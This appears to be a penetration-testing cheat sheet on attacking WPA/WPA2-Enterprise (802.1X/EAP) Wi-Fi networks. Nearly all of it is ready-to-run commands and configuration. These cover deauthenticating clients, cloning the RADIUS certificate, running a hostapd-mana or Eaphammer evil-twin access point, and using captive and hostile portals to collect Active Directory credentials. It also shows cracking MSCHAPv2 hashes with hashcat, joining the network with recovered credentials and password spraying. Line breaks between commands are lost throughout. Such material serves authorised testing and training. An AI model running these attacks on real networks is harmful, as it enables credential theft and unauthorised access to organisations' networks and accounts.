Attacking WPA/WPA2-Enterprise (802.1X / EAP)
WPA/WPA2-Enterprise networks authenticate users against a RADIUS server over 802.1X/EAP. This section covers extracting the RADIUS certificate, standing up a rogue authentication endpoint using either the manual hostapd-mana / FreeRADIUS workflow or the automated Eaphammer workflow, capturing and cracking credentials, and password spraying.
Overview
WPA2-Enterprise (802.1X/EAP) networks can be attacked by impersonating the legitimate access point and RADIUS server so that clients attempt to authenticate against an attacker-controlled endpoint, revealing usernames and MSCHAPv2 challenge/response material that can be cracked offline. Two workflows are shown below: a manual hostapd-mana / FreeRADIUS setup, and an automated Eaphammer setup. Deauthenticating live clients (see WPA/WPA2-PSK) forces them to reconnect to the rogue AP.
RADIUS Certificate Extraction
Capturing the RADIUS server certificate lets you clone its identity for a more convincing rogue AP.
# Put the card in monitor mode and capture around the targetsudo airmon-ng start wlan0sudo airodump-ng wlan0mon --band abgsudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF --channel <channel> -w mgt --output-format pcap
# Force a reconnection to capture the EAP exchangesudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0monsudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0monExtract the certificate and identity from the capture in Wireshark:
- Open the PCAP in Wireshark and apply the
tlsfilter to find the RADIUS certificate. - Look for a packet with the info “Server Hello, Certificate, Server Key Exchange, Server Hello Done”.
- In the frame detail pane, expand “Transport Layer Security” -> “TLSv1.2 Record Layer: Handshake Protocol: Certificate” -> “Handshake Protocol: Handshake” -> “Certificates” -> “1st Certificate”, right-click and choose “Export Bytes”, and save it as
cert.der. - Get the identity via Edit -> Find Packet, searching for the string “Response, Identity”. Expand the “Extensible Authentication Protocol” field and read the “Identity” field.
# Print the RADIUS TLS certificate as textopenssl x509 -inform der -in cert.der -text
# Extract certificate handshakes from a capture (alternative)tshark -nr capture.pcap -2 -R "ssl.handshake.certificate" -VManual Rogue AP (hostapd-mana / FreeRADIUS)
This is the manual OSWP-style workflow. It uses FreeRADIUS certificates and a hostapd-mana access point.
Prepare FreeRADIUS Certificates
# Edit the certificate configs using the values from the certificate abovesudo nano /etc/freeradius/3.0/certs/server.cnfsudo nano /etc/freeradius/3.0/certs/ca.cnf
# Remove the default Diffie-Hellman certificate and regeneratesudo rm -rf /etc/freeradius/3.0/certs/dhsudo su - && cd /etc/freeradius/3.0/certs && make destroycertssudo su - && cd /etc/freeradius/3.0/certs && makehostapd-mana Configuration
# Point hostapd-mana at the SSID and certificate pathssudo nano /etc/hostapd-mana/mana.conf# SSID of the APssid=Corp-EAP
# Network interface and driver. Ensure the interface lists 'AP' in# 'Supported interface modes' when running 'iw phy PHYX info'interface=wlan0driver=nl80211
# Channel and mode (confirm the channel is allowed with 'iw phy PHYX info')channel=10hw_mode=g
# Set hostapd up as an EAP serverieee8021x=1eap_server=1
# Key workaround for Win XPeapol_key_index_workaround=0
# EAP user fileeap_user_file=/etc/hostapd-mana/mana.eap_user
# Certificate paths created earlierca_cert=/etc/freeradius/3.0/certs/ca.pemserver_cert=/etc/freeradius/3.0/certs/server.pemprivate_key=/etc/freeradius/3.0/certs/server.keyprivate_key_passwd=whateverdh_file=/etc/freeradius/3.0/certs/dh
# Open authentication, WPA/WPA2, WPA Enterpriseauth_algs=1wpa=3wpa_key_mgmt=WPA-EAPwpa_pairwise=CCMP TKIP
# Enable Mana WPE and store captured credentialsmana_wpe=1mana_credout=/tmp/hostapd.credoutmana_eapsuccess=1mana_eaptls=1# Create the EAP user filesudo nano /etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
# Stop monitor mode and launch the rogue APsudo airmon-ng stop wlan0monsudo hostapd-mana /etc/hostapd-mana/mana.conf # you should see connectionsCapture and Crack Credentials
# View captured credentials and copy the hashes to a filecat /tmp/hostapd.credout# copy the hashes to e.g. wifi_hashes.txt
# Crack MSCHAPv2 credentials with Hashcat (mode 5500)hashcat -a 0 -m 5500 wifi_hashes.txt <wordlist>Connect to the Network
# Create a configuration file for the recovered credentialsnano wireless_mgt.conf
network={ ssid="Corp-EAP" scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP identity="<username>" password="<password>" phase1="peaplabel=0" phase2="auth=MSCHAPV2"}
# Connect using the config filesudo wpa_supplicant -i wlan0 -c wireless_mgt.confsudo wpa_supplicant -D nl80211 -i wlan0 -c wireless_mgt.conf
# Obtain an IP addresssudo dhclient wlan0 -vAutomated Rogue AP (Eaphammer)
Eaphammer automates the rogue-AP and credential-capture process for EAP networks.
Certificate Setup
cd ~/tools/eaphammersudo ./eaphammer --cert-wizardStealing RADIUS Credentials
# Evil twin against an EAP network, capturing credentials with --credssudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF \ --essid Corp-EAP \ --channel 1 \ --wpa-version 2 \ --interface wlan0 \ --auth wpa-eap \ --creds
sudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --wpa-version 2 --channel 1 --interface wlan0 --capture-wpa-handshakes yes --auth wpa-eap --credsCaptive Portal Attack
# Captive portal to also collect AD credentialssudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF --interface wlan0 --essid Corp-EAP --wpa-version 2 --channel 1 --auth wpa-eap --captive-portalHostile Portal Attack
sudo ./eaphammer --interface wlan0 --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --channel 1 --auth wpa-eap --wpa-version 2 --hostile-portal
sudo ./eaphammer -i wlan0 \ --essid Corp-EAP \ --channel 6 \ --wpa-version 2 \ --auth wpa-eap \ --hostile-portal \ --autocrackEvil Twin with MANA and Cloaking
# Leave out --auth to keep clients connecting (best for open networks)echo Corp-EAP > target-ess.txt # target namesecho AA:BB:CC:DD:EE:FF > mac-whitelist.txt # MAC addresses of targets
sudo ./eaphammer --interface wlan0 \ --essid Corp-EAP \ --channel 1 \ --bssid AA:BB:CC:DD:EE:FF \ --pmf enable \ --cloaking full \ --mana \ --wpa-version 2 \ --auth wpa-eap \ --creds \ --mac-whitelist mac-whitelist.txt \ --ssid-whitelist target-ess.txtKnown Beacon Attack
sudo ./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txtsudo ./eaphammer -i wlan0 --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --mana --loud --known-beacons --auth wpa-eap --known-ssids-file wordlist.txt --captive-portal --credsDeauthenticate Live Clients
for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; donePassword Spraying
If usernames are known (or guessed), spray a single password against the EAP network. These tools support PEAP/MSCHAPv2.
python2 ~/tools/air-hammer/air-hammer.py -i wlan0 -e Corp-EAP -P password -u ~/tools/SecLists/Usernames/Customised/CommonUsernames.txtsudo python2 ~/tools/Auto_EAP/Auto_EAP.py -i wlan0 -s Corp-EAP -U ~/tools/air-hammer/users.txt -p password -K WPA2-EAP -E PEAPsudo python2 ~/tools/Auto_EAP/Auto_EAP.py -i wlan0 -s Corp-EAP -U ~/tools/air-hammer/users.txt -p password -K WPA-EAP -E TTLSAdditional and Legacy Enterprise Tooling
The Python 2-era tools below (crEAP, EAPeak) predate the primary Eaphammer / hostapd-mana workflows above and are retained as older/alternative options.
# crEAP - capture EAP identities and credentialssudo python2 ~/tools/creap/crEAP.py
# EAPeak - audit EAP exchangescd ~/tools/eapeaksudo pipenv shellpython2 eapeak -i wlan0 -s Corp-EAP -lAdvanced EAP Notes
# Stealing AD credentials via a hostile portal (EAP networks require creds to associate)sudo ./eaphammer --interface wlan0 \ --bssid AA:BB:CC:DD:EE:FF \ --essid Corp-EAP \ --channel 6 \ --auth wpa-eap \ --hostile-portal
# Captive portal attack (needs RADIUS creds to attack mutual-auth inner protocols such as MSCHAPv2)./eaphammer --bssid AA:BB:CC:DD:EE:FF \ --essid Corp-EAP \ --channel 149 \ --interface wlan0 \ --captive-portal


